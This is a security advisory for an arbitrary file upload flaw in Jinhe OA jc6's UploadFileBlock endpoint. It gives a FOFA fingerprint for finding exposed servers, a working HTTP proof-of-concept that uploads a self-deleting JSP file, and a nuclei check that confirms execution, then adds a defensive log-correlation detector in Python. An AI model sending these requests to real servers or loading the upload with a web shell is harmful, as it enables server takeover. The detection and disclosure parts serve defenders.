Jinhe OA jc6 UploadFileBlock arbitrary file upload vulnerability
1. Vulnerability description
The UploadFileBlock interface of the Jinhe OA jc6 system contains an arbitrary file upload vulnerability. A malicious attacker could exploit it to upload a malicious file, ultimately compromising the server.
2. Vulnerability identifiers
| CVE | CNVD | CNNVD |
|---|---|---|
| - | - | - |
3. Affected scope
| Name | Version |
|---|---|
| - | - |
4. Search fingerprint
FOFA: body="/jc6/platform/sys/login"
5. POC
```http
POST /jc6/JHSoft.WCF/Attachment/UploadFileBlock HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: */*
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK

------WebKitFormBoundary5iALAXlSiqxJXrhK
Content-Disposition: form-data; name="filename"; filename="ceshi.jsp"

<% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
------WebKitFormBoundary5iALAXlSiqxJXrhK--
```
nuclei detection
```yaml
id: jinhe-jc6-UploadFileBlock-fileupload

info:
  name: 金和OA jc6系统UploadFileBlock接口处存在任意文件上传漏洞 恶意攻击者可能利用此漏洞上传恶意文件 最终导致服务器失陷
  author: test
  severity: high
  metadata:
    fofa: body="/jc6/platform/sys/login"

variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /jc6/JHSoft.WCF/Attachment/UploadFileBlock HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
        Accept: */*
        Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8
        Connection: close
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK

        ------WebKitFormBoundary5iALAXlSiqxJXrhK
        Content-Disposition: form-data; name="filename"; filename="{(unknown)}.jsp"

        <% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
        ------WebKitFormBoundary5iALAXlSiqxJXrhK--
      - |
        GET /jc6/upload/{(unknown)}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"Hello World!")
```
6. Remediation
Update to the latest version.
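Until the upgrade is applied, the two requests in the POC leave a recognisable trail in the web server access log: a POST to the UploadFileBlock endpoint followed by a GET for a `.jsp` file under `/jc6/upload/` from the same client. The script below is an added example for defenders, not part of the advisory or of the vendor's software. It assumes the server writes a standard combined access log; the endpoint and upload paths come from the POC above, and the log lines are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Paths taken from the POC in this advisory.
UPLOAD_ENDPOINT = "/jc6/JHSoft.WCF/Attachment/UploadFileBlock"
UPLOAD_DIR_PREFIX = "/jc6/upload/"
SCRIPT_EXTS = (".jsp", ".jspx")
# How long after an upload a follow-up GET is still treated as related (assumption).
CORRELATION_WINDOW = timedelta(minutes=10)

# Combined access log: ip ident user [time] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log for the example; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0800] "GET /jc6/platform/sys/login HTTP/1.1" 200 5120
10.0.0.5 - - [12/Mar/2024:10:01:10 +0800] "POST /jc6/JHSoft.WCF/Attachment/UploadFileBlock HTTP/1.1" 200 87
10.0.0.5 - - [12/Mar/2024:10:01:12 +0800] "GET /jc6/upload/ceshi.jsp HTTP/1.1" 200 13
10.0.0.9 - - [12/Mar/2024:10:05:00 +0800] "POST /jc6/JHSoft.WCF/Attachment/UploadFileBlock HTTP/1.1" 200 87
10.0.0.9 - - [12/Mar/2024:10:05:03 +0800] "GET /jc6/upload/report.pdf HTTP/1.1" 200 40211
10.0.0.7 - - [12/Mar/2024:10:30:00 +0800] "GET /jc6/upload/x.jsp HTTP/1.1" 404 0
"""


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def is_script_under_upload(path):
    """True if the request path is a server-side script inside the upload directory."""
    p = path.split("?", 1)[0].lower()
    return p.startswith(UPLOAD_DIR_PREFIX) and p.endswith(SCRIPT_EXTS)


def detect(log_text):
    """Scan log text and return alerts for JSP access under /jc6/upload/.

    Severity: 'critical' when the same client POSTed to the upload endpoint
    shortly before and the JSP was served with 200; 'high' when a JSP under
    the upload directory was served with 200 without a visible upload; 'medium'
    for a failed probe of a script in the upload directory.
    """
    last_upload = {}  # client ip -> time of its most recent POST to UploadFileBlock
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path = rec["ip"], rec["ts"], rec["path"]
        if rec["method"] == "POST" and path.split("?", 1)[0] == UPLOAD_ENDPOINT:
            last_upload[ip] = ts
            continue
        if rec["method"] == "GET" and is_script_under_upload(path):
            prior = last_upload.get(ip)
            correlated = prior is not None and ts - prior <= CORRELATION_WINDOW
            if rec["status"] == 200 and correlated:
                severity = "critical"
            elif rec["status"] == 200:
                severity = "high"
            else:
                severity = "medium"
            alerts.append({
                "severity": severity,
                "ip": ip,
                "path": path,
                "status": rec["status"],
                "time": ts.isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The normal upload of `report.pdf` by 10.0.0.9 produces no alert, because only server-side script extensions under the upload directory are flagged; a 200 for any `.jsp` there is worth investigating on its own, since an attachment directory should never execute code.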